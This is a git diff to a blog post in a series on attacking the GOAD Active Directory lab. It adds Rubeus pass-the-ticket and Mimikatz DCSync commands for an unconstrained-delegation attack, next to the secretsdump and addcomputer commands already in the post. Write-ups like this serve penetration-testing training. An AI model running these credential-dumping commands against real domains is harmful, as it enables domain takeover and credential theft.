diff --git a/_posts/2022-11-13-GOADv2-pwning-part10.md b/_posts/2022-11-13-GOADv2-pwning-part10.md index d713674..9f2fed3 100644 --- a/_posts/2022-11-13-GOADv2-pwning-part10.md +++ b/_posts/2022-11-13-GOADv2-pwning-part10.md @@ -135,7 +135,15 @@ secretsdump.py -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING ![deleg_unconcstrained_secrets_dump.png](/assets/blog/GOAD/deleg_unconcstrained_secrets_dump.png) -> Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on Winterfell and bypass the defender AV +> Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz. Having a domain-joined machine should make this attack easier. + +```powershell +.\Rubeus.exe ptt /ticket:doIFrzCCBaugAwIB...... +.\mimikatz.exe "lsadump::dcsync /domain:sevenkingdoms.local /user:kingslanding$" "exit" +``` + +![image](https://github.com/Mayfly277/mayfly277.github.io/assets/18597330/d1b83fd7-1c9e-4791-89a5-4489f287b9b2) + > Unless you didn't notice, the unconstrained delegation abuse was here exploited to pass from the child to the parent domain ;) {: .prompt-tip } @@ -334,4 +342,4 @@ addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host kingsla - And i recommend you to take a look at charlie's talk about delegation : [https://www.thehacker.recipes/ad/movement/kerberos/delegations#talk](https://www.thehacker.recipes/ad/movement/kerberos/delegations#talk) -Next time we will have fun with ACL : : ([Goad pwning part11]({% link _posts/2022-12-07-GOADv2-pwning-part11.md %})) :) \ No newline at end of file +Next time we will have fun with ACL : : ([Goad pwning part11]({% link _posts/2022-12-07-GOADv2-pwning-part11.md %})) :)